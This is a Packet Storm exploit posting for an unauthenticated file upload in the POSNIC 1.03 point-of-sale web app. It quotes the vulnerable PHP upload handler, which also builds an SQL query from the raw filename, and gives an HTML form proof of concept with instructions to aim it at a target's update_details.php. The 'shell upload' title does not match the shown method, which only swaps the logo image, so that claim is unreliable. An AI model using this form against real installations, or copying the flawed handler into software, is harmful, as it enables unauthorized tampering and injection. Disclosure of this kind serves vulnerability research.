exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

POSNIC 1.03 Shell Upload

POSNIC 1.03 Shell Upload
Posted Feb 6, 2017
Authored by Rony Das

POSNIC version 1.03 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell
SHA-256 | b0659cc1ef1702e8795081214734b821aa8dc6052f86b9ec6400a8635f7f89ef
Download | Favorite | View

POSNIC 1.03 Shell Upload

Change Mirror Download
<!--
# Exploit Title: POSNIC Unauthenticated File Upload
# Date: 04-02-2017
# Exploit Author: Rony Das
# Vendor Homepage: http://www.posnic.com
# Software Link: https://github.com/Posnic/POSNIC-1.03
# Version: 1.03
# Tested on: Ubuntu 14.04
-->

<!-- 
VULNERABLE CODE: /update_details.php

<if (isset($_POST['submit']) and $_POST['submit'] === 'Submit') {

    $allowedExts = array("gif", "jpeg", "jpg", "png");
    $temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if ((($_FILES["file"]["type"] == "image/gif")
            || ($_FILES["file"]["type"] == "image/png"))
        && ($_FILES["file"]["size"] < 30000)
        && in_array($extension, $allowedExts)
    ) {
        if ($_FILES["file"]["error"] > 0) {
            echo "Return Code: " . $_FILES["file"]["error"] . "<br>";
        } else {
            $upload = $_FILES["file"]["name"];
            $type = $_FILES["file"]["type"];


            if (file_exists("upload/" . $_FILES["file"]["name"])) {

                unlink($upload);
            }


            $name = $_FILES["file"]["name"];
            move_uploaded_file($_FILES["file"]["tmp_name"],
                "upload/" . $name);
            //echo "Stored in: " . "upload/" . $_FILES["file"]["name"];
            $upload;
            $_SESSION['logo'] = $upload;

            # Note that filters and validators are separate rule sets and method calls. There is a good reason for this.

            $db->query("UPDATE store_details  SET log ='" . $upload . "',type='" . $type . "'");

-->



<!-- Exploit -->
<!-- 
Put your target to the action="http://yourtarget.com/posnicdirectory/update_details.php" 
Then choose a image file and rename it to "posnic.png" this replaces the LOGO , 
not overwrites because they delete's the file if already exists and replaces with the 
new uploaded file.

//if (file_exists("upload/" . $_FILES["file"]["name"])) {

//                unlink($upload);
//            }
-->

<center>
<form action="http://localhost/posnic/update_details.php" method="POST" enctype="multipart/form-data">
            <p>Upload Logo</p>
            <input type="file" name="file" id="file"><br><br><br>
            <input type="submit" name="submit" value="Submit">
</form>
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close